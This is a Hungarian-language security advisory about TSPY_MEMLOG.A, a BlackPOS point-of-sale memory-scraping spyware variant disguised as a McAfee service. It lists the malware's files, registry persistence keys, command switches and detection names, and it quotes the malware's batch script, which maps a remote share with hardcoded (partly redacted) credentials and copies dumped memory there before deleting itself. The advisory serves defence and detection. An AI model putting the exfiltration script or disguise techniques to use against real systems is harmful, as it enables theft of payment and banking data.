Kémprogram TSPY_MEMLOG.A

CH azonosító

CH-11565

Angol cím

TSPY_MEMLOG.A

Felfedezés dátuma

2014.08.28.

Súlyosság

Alacsony

Érintett rendszerek

Microsoft

Érintett verziók

Windows 2000, Windows Server 2003, Windows XP (32-bit, 64-bit), Windows Vista (32-bit, 64-bit), Windows 7 (32-bit, 64-bit)

Összefoglaló

Ez a kártékony program a BlackPOS új variánsa, melynek célpontjai főként lakossági bankszámlák. A program egy antivírus szoftver szolgáltatásának álcázza magát, így rejtőzködve a számítógépen.

Ez a kémprogram egyéb kártékony kód letöltéseként, vagy egy fertőzött weboldal látogatásával kerül a számítógépre.

Leírás

A kémprogram bemásolja a következő komponens állományokat:

  • {malware path}t.bat – végrehajtás után törlésre kerül
  • t:tempdotnetNDP45-KB2737084-x86.exe – a McTrayErrorLogging.dll file bizonyos részeit tartalmazza
  • {malware path}McTrayErrorLogging.dll – a memória bizonyos részeit tartalmazza

A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs bejegyzéseket:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcImagePath = “{malware path and filename} -service”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDisplayName = “McAfee Framework Management Instrumentation”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcObjectName = “LocalSystem”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcStart = “2”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcType = “10”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcErrorControl = “1”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcDescription = “Provides systems management information to and from McAfee Framework Objects”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvcSecuritySecurity = “{value}”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanworkstationDependOnService = “mcfmisvc”

A program regisztrálja magát egy rendszer szolgáltatásként, hogy biztosítsa az automatikus végrehajtását minden rendszerindításkor, ezért létrehozza az alábbi regisztrációs kulcsot:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmcfmisvc

A kémprogram a következő utasításokat ismeri:

  • -start
  • -stop
  • -install
  • -uninstall
  • -service

Beolvassa a memóriában található összes folyamatot, kivéve az alábbiakat:

  • smss.exe
  • csrss.exe
  • wininit.exe
  • services.exe
  • lsass.exe
  • svchost.exe
  • winlogon.exe
  • sched.exe
  • spoolsv.exe
  • System
  • conhost.exe
  • ctfmon.exe
  • wmiprvse.exe
  • mdm.exe
  • taskmgr.exe
  • explorer.exe
  • RegSrvc.exe
  • firefox.exe
  • chrome.exe

A t.bat komponens bemásolja a McTrayErrorLogging.dll tartalmát a t:tempdotnetNDP45-KB2737084-x86.exe fájlba. Ezt a támadó arra használja, hogy hozzáférést kapjon a megosztott géphez egy adott felhasználón keresztül, hogy fájlt küldhessen át.

A következő parancsokat tartalmazza:

set src=t:tempdotnetNDP45-KB2737084-x86.exe
net use t: \{BLOCKED}.{BLOCKED}.2.153d$ {BLOCKED}! /user:{BLOCKED}0.{BLOCKED}4.2.{BLOCKED}3{BLOCKED}1
if exist %src% (
type McTrayErrorLogging.dll >> t:tempdotnetNDP45-KB2737084-x86.exe.del /F /Q McTrayErrorLogging.dll
)
net use t: /DEL /yes
del /F /Q t.bat

A kémprogramot a következő neveken tartják még nyílván: Troj/Agent-AING (Sophos), W32/Zbot.QB.gen!Eldorado (FProt), Trojan-FEJZ!B57C5B49DAB6 (McAfee)

Megoldás

Frissítse az antivírus szoftverét.

Az eltávolításhoz szükséges információk a hivatkozásban találhatók.